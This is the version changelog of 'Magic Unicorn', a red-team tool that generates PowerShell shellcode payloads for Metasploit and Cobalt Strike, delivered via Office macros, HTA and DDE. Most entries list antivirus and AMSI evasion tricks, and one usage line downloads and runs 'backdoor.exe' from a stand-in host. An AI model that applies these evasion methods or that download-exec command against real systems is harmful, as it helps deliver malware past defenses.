CHANGELOG.txt
~~~~~~~~~~~~~~~~
version 3.17
~~~~~~~~~~~~~~~~
* change AMSI bytecode for better evasion for AMSI providers
~~~~~~~~~~~~~~~~
version 3.16
~~~~~~~~~~~~~~~~
* change AMSI bytecode to evade AMSI provider detection
~~~~~~~~~~~~~~~~
version 3.15
~~~~~~~~~~~~~~~~
* AMSI signature fix
* added AMSI print decoded to payload output
* AMSI bypass signature bypass
~~~~~~~~~~~~~~~~
version 3.14
~~~~~~~~~~~~~~~~
* slimmed down payload to allow cmdline char restrictions
* AMSI signature bypass
~~~~~~~~~~~~~~~~
version 3.13
~~~~~~~~~~~~~~~~
* better evasion for Rasta's AMSI BYPASS
* better evasion for Unicorn payload
~~~~~~~~~~~~~~~~
version 3.12
~~~~~~~~~~~~~~~~
* fix an issue where if payload was generated, it would mess up the macro generation for AMSI_BYPASS if on
* fix an issue in Metasploit generation payload would throw a lock file error. Updating Metasploit fixes this issue and added a prompt.
~~~~~~~~~~~~~~~~
version 3.11
~~~~~~~~~~~~~~~~
* fix bug on amsi bypass
* break av signature chain for payload
* add better error handling
* break av signature for amsi bypass
* restructure amsi bypass code
* add automatic evasion for opcodes
~~~~~~~~~~~~~~~~
version 3.10
~~~~~~~~~~~~~~~~
* fix issue where meterpreter would not connect back as it was not specifying port properly
* remove error message on length size when using AMSI_BYPASS=ON
* add better evasion against amsi
~~~~~~~~~~~~~~~~
version 3.9
~~~~~~~~~~~~~~~~
* incorporate better disable AMSI from Rasta - already encoded to get around detection https://raw.githubusercontent.com/rasta-mouse/AmsiScanBufferBypass/master/ASBBypass.ps1
* add better evasion
* added bypass_amsi on by default it will now generate two stages for powershell commands, you can turn this off in the unicorn.py option AMSI_BYPASS="ON" to OFF
~~~~~~~~~~~~~~~~
version 3.8.8
~~~~~~~~~~~~~~~~
* remove double quotes which would cause compatibility issues on prior versions of Windows 10
* change around virtualprotect for evasion
~~~~~~~~~~~~~~~~
version 3.8.7
~~~~~~~~~~~~~~~~
* add () to bypass amsi
~~~~~~~~~~~~~~~~
version 3.8.6
~~~~~~~~~~~~~~~~
* fix escaping issue
* fix decode python3 error
~~~~~~~~~~~~~~~~
version 3.8.5
~~~~~~~~~~~~~~~~
* add integer number for evasion
~~~~~~~~~~~~~~~~
version 3.8.4
~~~~~~~~~~~~~~~~
* split up syswow64
~~~~~~~~~~~~~~~~
version 3.8.3
~~~~~~~~~~~~~~~~
* reduce payload size by removing temporary replaces
* add additional calloc/createthread changes to bypass signatures
* remove print statement for shellcode
~~~~~~~~~~~~~~~~
version 3.8.2
~~~~~~~~~~~~~~~~
* add dllimport function type to get around signatures
~~~~~~~~~~~~~~~~
version 3.8.1
~~~~~~~~~~~~~~~~
* changed 32/64 bit detection method to [environment]::Is64BitOperatingSystem -eq 'True'
* mangled true word to split it up
* fixed an error that would cause raw_input to error out on python 2 (not 3) when using AMSI_BYPASS to ON
~~~~~~~~~~~~~~~~
version 3.8
~~~~~~~~~~~~~~~~
* randomize noexit
* fix a python3 decode issue when generating meterpreter shellcode
* fix raw_input python 3 compatibility
* fix lambda error with python3 and decode format
* added a check for x64 bit shellcode and automatically downgrade payload for meterpreter
~~~~~~~~~~~~~~~~
version 3.7.6
~~~~~~~~~~~~~~~~
* randomize downgrade code for evasion
~~~~~~~~~~~~~~~~
version 3.7.5
~~~~~~~~~~~~~~~~
* randomize IEX command
~~~~~~~~~~~~~~~~
version 3.7.4
~~~~~~~~~~~~~~~~
* add randomization on byte replacing
~~~~~~~~~~~~~~~~
version 3.7.3
~~~~~~~~~~~~~~~~
* remove stage encoding and configure meterpreter listener options for better evasion
~~~~~~~~~~~~~~~~
version 3.7.2
~~~~~~~~~~~~~~~~
* fix macro injection escaping
* when using smallest payload, it gets flagged - removing smallest option flag for meterpreter since we don't need it anymore due to code optimization
~~~~~~~~~~~~~~~~
version 3.7.1
~~~~~~~~~~~~~~~~
* add Windows 7 support for Unicorn payload
~~~~~~~~~~~~~~~~
version 3.7
~~~~~~~~~~~~~~~~
* remove variable name as random string insertion for av avoidance
* add encoding and automatic stage loading in meterpreter (will flag AV) - looks to be time-gated, just load stdapi once meterpreter loaded
* added better evasion around sv and gv
~~~~~~~~~~~~~~~~
version 3.6.11
~~~~~~~~~~~~~~~~
* more evasion on add-type
~~~~~~~~~~~~~~~~
version 3.6.10
~~~~~~~~~~~~~~~~
* shorten up payload and av evasion
~~~~~~~~~~~~~~~~
version 3.6.9
~~~~~~~~~~~~~~~~
* move -pass to a different location
~~~~~~~~~~~~~~~~
version 3.6.8
~~~~~~~~~~~~~~~~
* mangle more CreateThread upon execution
~~~~~~~~~~~~~~~~
version 3.6.7
~~~~~~~~~~~~~~~~
* mangle word for Win32Functions
~~~~~~~~~~~~~~~~
version 3.6.6
~~~~~~~~~~~~~~~~
* added mangle word for DllImport also shortened codebase
~~~~~~~~~~~~~~~~
version 3.6.5
~~~~~~~~~~~~~~~~
* added mangle word for CreateThread
~~~~~~~~~~~~~~~~
version 3.6.4
~~~~~~~~~~~~~~~~
* removed line continuation error when using macro injection
~~~~~~~~~~~~~~~~
version 3.6.3
~~~~~~~~~~~~~~~~
* converted from VirtualAlloc to calloc and some additional changes
~~~~~~~~~~~~~~~~
version 3.6.2
~~~~~~~~~~~~~~~~
* mangled VirtualAlloc for new signature updates
~~~~~~~~~~~~~~~~
version 3.6.1
~~~~~~~~~~~~~~~~
* broke out function for parsing -f c in msfvenom so it can be used in other locations
* shrunk payload size while enabling shikata_ga_nai for shellcode generation with unicorn by randomized special characters - shrinks payload drastically
* added better handling for custom shellcode for metasploit
* added ability to use custom shellcode to the custom shellcode generation for hta and macro - python unicorn.py <path_to_shellcode.txt> shellcode hta / macro / etc.
~~~~~~~~~~~~~~~~
version 3.6
~~~~~~~~~~~~~~~~
* turn AMSI bypass to OFF by default, not needed unless you want to disable/patch in memory
* removed liquify_bytes function for more preferred and smaller method which does replacement methods to circumvent AMSI signature providers
~~~~~~~~~~~~~~~~
version 3.5.3
~~~~~~~~~~~~~~~~
* added wording and help menu for amsi bypass
* added command line option for download/exec with macro
~~~~~~~~~~~~~~~~
version 3.5.2
~~~~~~~~~~~~~~~~
* fix a bug that would cause download/exec not to work when using macro
~~~~~~~~~~~~~~~~
version 3.5.1
~~~~~~~~~~~~~~~~
* more evasion *yawn*
* added amsi bypass to get around completely, adds amsi flag to command line. If you are using this then the 2191 cmd prompt limit will be larger
* added a PRINT_DECODED to unicorn.py, turn this to ON if you want to see the decoded command in its full extent
~~~~~~~~~~~~~~~~
version 3.5
~~~~~~~~~~~~~~~~
* add randomized URILength - YOLO Justin Elze
* removed sleep function for preferred -NoExit
* add more evasion
~~~~~~~~~~~~~~~~
version 3.4.5
~~~~~~~~~~~~~~~~
* move to while($true) instead of for loop
* fix byte splitting for match on regular expression
* slim down code (woot)
* add better handling of liquify bytes
~~~~~~~~~~~~~~~~
version 3.4.4
~~~~~~~~~~~~~~~~
* remove byte designation - not needed already in byte format
~~~~~~~~~~~~~~~~
version 3.4.3
~~~~~~~~~~~~~~~~
* fix when liquify bytes called would not reroll variable names which could cause conflicts
~~~~~~~~~~~~~~~~
version 3.4.2
~~~~~~~~~~~~~~~~
* remove -e''c as this breaks windows 7 compatibility, now works on win7
~~~~~~~~~~~~~~~~
version 3.4.1
~~~~~~~~~~~~~~~~
* remove byte specification, not needed and shortens code base
* fix cobalt strike hta and macro generation wording
~~~~~~~~~~~~~~~~
version 3.4
~~~~~~~~~~~~~~~~
* fix opening payload with file error by using open instead (thanks jmhickman for PR)
* fix macro injection technique that was not spawning a child process window which would cause powershell to fail
* fix 32 bit compatibility
* add better randomization variable name check conflicts (.lower())
* fix hta attack vector
* add a payload check for custom shellcode and cobalt strike to ensure it's formatted properly
~~~~~~~~~~~~~~~~
version 3.3.2
~~~~~~~~~~~~~~~~
* add double () for defender signature update
~~~~~~~~~~~~~~~~
version 3.3.1
~~~~~~~~~~~~~~~~
* fix bugs where vars would be overwritten
* readd exception handling
~~~~~~~~~~~~~~~~
version 3.3
~~~~~~~~~~~~~~~~
* added back 32 bit compatibility
* added better evasion through kernel32.dll
* shaved shellcode size
* move back to IntPtr, system.int32 no longer needed
* add a variable check to ensure there's no variable name conflicts when using the powershell code
~~~~~~~~~~~~~~~~
version 3.2.10
~~~~~~~~~~~~~~~~
* use System.Int32 instead of int
~~~~~~~~~~~~~~~~
version 3.2.9
~~~~~~~~~~~~~~~~
* bugfix causing powershell to terminate
~~~~~~~~~~~~~~~~
version 3.2.8
~~~~~~~~~~~~~~~~
* change intptr to int
~~~~~~~~~~~~~~~~
version 3.2.7
~~~~~~~~~~~~~~~~
* randomize service name (lol)
~~~~~~~~~~~~~~~~
version 3.2.6
~~~~~~~~~~~~~~~~
* added more byte splitting for better evasion
* rewrote components for macro injection to circumvent av
* rewrote components for HTA injection to circumvent av
~~~~~~~~~~~~~~~~
version 3.2.5
~~~~~~~~~~~~~~~~
* add byte splitting based on defender sigs
~~~~~~~~~~~~~~~~
version 3.2.4
~~~~~~~~~~~~~~~~
* added randomized integer lengths for dynamic byte ranges
~~~~~~~~~~~~~~~~
version 3.2.3
~~~~~~~~~~~~~~~~
* create longer byte arrays for defender rule bypass
~~~~~~~~~~~~~~~~
version 3.2.2
~~~~~~~~~~~~~~~~
* add python 3 compatibility
* remove filewrite variable and move to function write_file for SettingContent-ms
~~~~~~~~~~~~~~~~
version 3.2.1
~~~~~~~~~~~~~~~~
* update blog post and update readme
* update unicorn metasploit meterpreter payload to remove a CLD from beginning of shellcode which was being snagged by defender
~~~~~~~~~~~~~~~~
version 3.2
~~~~~~~~~~~~~~~~
* added new SettingContent-ms from enigma0x3 to Unicorn supports cobalt strike, metasploit, and custom shellcode
* remove %windir%, getting flagged by AV
~~~~~~~~~~~~~~~~
version 3.1
~~~~~~~~~~~~~~~~
* added secondary parse for older versions of cobalt strike
* added better error handling around list index out of range
* modified lower stack size due to powershell crashing sometimes, seems to be more stable now
~~~~~~~~~~~~~~~~
version 3.0
~~~~~~~~~~~~~~~~
* added ability to import cobalt strike C# stager and use that as a unicorn based attack
* added ability to import any shellcode directly into unicorn
* remove cmd.exe depend on WSCRIPT.Shell - not needed and increases cmd line length limit
* added ability to use custom shellcode with cobalt strike and shellcode methods for hta
* added ability to use custom shellcode with cobalt strike and shellcode methods for macro
* fixed line continuation error for long payloads when using excel (can't have long strings with & plus 25)
* add hiding of powershell name in hta file
~~~~~~~~~~~~~~~~
version 2.14
~~~~~~~~~~~~~~~~
* fix replace for /C that broke syntax for macros
~~~~~~~~~~~~~~~~
version 2.13
~~~~~~~~~~~~~~~~
* added switches on command lines for evasion
~~~~~~~~~~~~~~~~
version 2.12
~~~~~~~~~~~~~~~~
* added better handling for stack size detection on signatures - should no longer get flagged
~~~~~~~~~~~~~~~~
version 2.11
~~~~~~~~~~~~~~~~
* reduce filesize by removing shikata from encoding on payload generation
* add length limit size description on error on size
~~~~~~~~~~~~~~~~
version 2.10
~~~~~~~~~~~~~~~~
* added IEX and formula evasion as DDE methods and split out attack vector into 3 different components
* rewrote the download/exec payload so that it is custom shellcode that is manually patched with URL instead of metasploit one
* numerous other enhancements and fixes
~~~~~~~~~~~~~~~~
version 2.9.3
~~~~~~~~~~~~~~~~
* add better obfuscation on dde
~~~~~~~~~~~~~~~~
version 2.9.2
~~~~~~~~~~~~~~~~
* fix compatibility with windows 7 - for some reason -e''c in Windows 7 breaks Unicorn whereas works fine within Windows 10
~~~~~~~~~~~~~~~~
version 2.9.1
~~~~~~~~~~~~~~~~
* fix typo in powershell_command
* added better obfuscation of path and code (thanks Will)
~~~~~~~~~~~~~~~~
version 2.9
~~~~~~~~~~~~~~~~
* added a sys.exit() on length amount
* added new dde code exec through unicorn from sensepost
* fixed some wording in help menu
* general code cleanup
* slimmed down command line some more with separator reduction and variable name size length
~~~~~~~~~~~~~~~~
version 2.8.2
~~~~~~~~~~~~~~~~
* added better handling of randomized variable names
* removed an extra semicolon
* fixed typo
* added count length for payload to ensure payload doesn't increase past max command line length of 8191
* fixed minor casing on Start-Sleep
~~~~~~~~~~~~~~~~
version 2.8.1
~~~~~~~~~~~~~~~~
* remove static variables - flagged by A/V
~~~~~~~~~~~~~~~~
version 2.8
~~~~~~~~~~~~~~~~
* shortens length and obfuscation of unicorn command
* removed direct -ec from powershell command
~~~~~~~~~~~~~~~~
version 2.7.5
~~~~~~~~~~~~~~~~
* fix missing powershell call (thanks matterpreter)
* improved additional wording on error message for macros
~~~~~~~~~~~~~~~~
version 2.7.4
~~~~~~~~~~~~~~~~
* add a more real corrupt message from excel macro injection
~~~~~~~~~~~~~~~~
version 2.7.3
~~~~~~~~~~~~~~~~
* fixed powershell injection obfuscation in macro injection - that was a pain :P
* added bold red to macro AutoOpen/Auto_Open difference based on version number
* fixed powershell injection length issues by skimming down the chunking of powershell commands
~~~~~~~~~~~~~~~~
version 2.7.2
~~~~~~~~~~~~~~~~
* random cleanup
~~~~~~~~~~~~~~~~
version 2.7.1
~~~~~~~~~~~~~~~~
* fixed merge issue
~~~~~~~~~~~~~~~~
version 2.7
~~~~~~~~~~~~~~~~
* added description to macro attack for AutoOpen/Auto_Open()
* added obfuscation for actual base64 encoded strings
* added better randomization on variable names
~~~~~~~~~~~~~~~~
version 2.6
~~~~~~~~~~~~~~~~
* fixed an issue when generating hta if a folder was there it would not remove properly and overwrite
* fixed a bug introduced by new obfuscation on proper escaping of quotes
* added new obfuscation around HTA, variable names and split up shell commands to evade detection
* improved code base for HTA attack vector and reliability
~~~~~~~~~~~~~~~~
version 2.5.1
~~~~~~~~~~~~~~~~
* minor string format cleanup
* pep8 formatting
~~~~~~~~~~~~~~~~
version 2.5
~~~~~~~~~~~~~~~~
* complete rehaul on macro injection - adds heavy obfuscation through the entire codebase
* changed generate_random_strings to remove any digits - this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code
~~~~~~~~~~~~~~~~
version 2.4.3
~~~~~~~~~~~~~~~~
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect
~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~
* added shortened version of -window hidden to -w 1 which is shorthand for window hidden
~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~
* added shortened method for obfuscation
~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~
* added better handling if msf or shellcode didn't get formatted properly
* added a new technique for obfuscation that should not get picked up anymore and removes the need for -e or -ec
~~~~~~~~~~~~~~~~
version 2.3.5
~~~~~~~~~~~~~~~~
* added better evasion on encodedcommand
~~~~~~~~~~~~~~~~
version 2.3.4
~~~~~~~~~~~~~~~~
* added decoded base64 -encodedcommand for better av evasion
~~~~~~~~~~~~~~~~
version 2.3.3
~~~~~~~~~~~~~~~~
* most AVs were flagging on -enc instead of -EncodedCommand along with base64 would flag windows defender.. looks like this gets around it on both macro and standard ps1/encoded command params.
~~~~~~~~~~~~~~~~
version 2.3.2
~~~~~~~~~~~~~~~~
* change auto_open to autopen() - thanks @JAshton
~~~~~~~~~~~~~~~~
version 2.3.1
~~~~~~~~~~~~~~~~
* fix indent issue
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* added support for windows/download_exec as a payload option - just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe - note it doesn't need to be an exe, whatever you want to download and execute
* fixes an issue that caused macro injection to not properly work (duplicate powershell command)
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but it's better than before) - AV picking up on variables and base64 encoded strings
~~~~~~~~~~~~~~~~
version 2.1.2
~~~~~~~~~~~~~~~~
* added enablestageencoding to true by default
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* added --smallest flag to msfvenom generate which compacts shellcode to smaller size
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* added ability to import your own powershell into attacks (thanks to curi0usJack pull request)
* fixed an issue when generating macro attack with appropriate spacing on macros
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* added brand new hta attack vector for direct web application compromise (thanks Justin Elze)
* added brand new attack binary to cert (thanks Matthew Graeber)
* added window.close(); after script
~~~~~~~~~~~~~~~~
version 1.3
~~~~~~~~~~~~~~~~
* slimmed down powershell injection code even more
* when using windows/meterpreter/reverse_https, the option flags StagerURILength=5 StagerVerifySSLCert=false are specified in order to trim down payload. This is due to char restriction sizes when pasting into a command window. With these two settings, the codebase is slimmed down significantly and fits within the normal length
* added support for shikata ga nai to obfuscate shellcode prior to utf and b64encoding. Will now throw off sigs if contained inside of a file.
~~~~~~~~~~~~~~~~
version 1.2
~~~~~~~~~~~~~~~~
* fixed an issue where powershell injection may not work on 32 bit platforms
* shaved command line argument down around 32 bytes
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload
~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
* incorporated new macro attack from Rik van Duijn RCX @rikduijn
* code cleanup and fixed an issue that would not present argument values when not formatted properly
* channeled stderr to subprocess.PIPE
* slimmed unicorn powershell injection code about 17 bytes to compact powershell injection
~~~~~~~~~~~~~~~~
version 0.5
~~~~~~~~~~~~~~~~
* fixed hidden window command when using powershell injection
~~~~~~~~~~~~~~~~
version 0.4
~~~~~~~~~~~~~~~~
* shortened powershell injection code by removing un-used code and shortening initial command names
* removed EnableStageEncoding - after testing extensively, this can produce unreliable results.
* fixed a bug that caused unicorn to not work properly due to changes with MSFVenom
* slimmed encoded powershell command, removed un-used else statement
~~~~~~~~~~~~~~~~
version 0.3
~~~~~~~~~~~~~~~~
* updated msfvenom to include format type and architecture to remove bug it would not generate appropriate shellcode
~~~~~~~~~~~~~~~~
version 0.2
~~~~~~~~~~~~~~~~
* changed output name
* added appropriate licensing
* slimmed the powershell code and added noprofile to downgrade process
~~~~~~~~~~~~~~~~
version 0.1
~~~~~~~~~~~~~~~~
* initial release of magic unicorn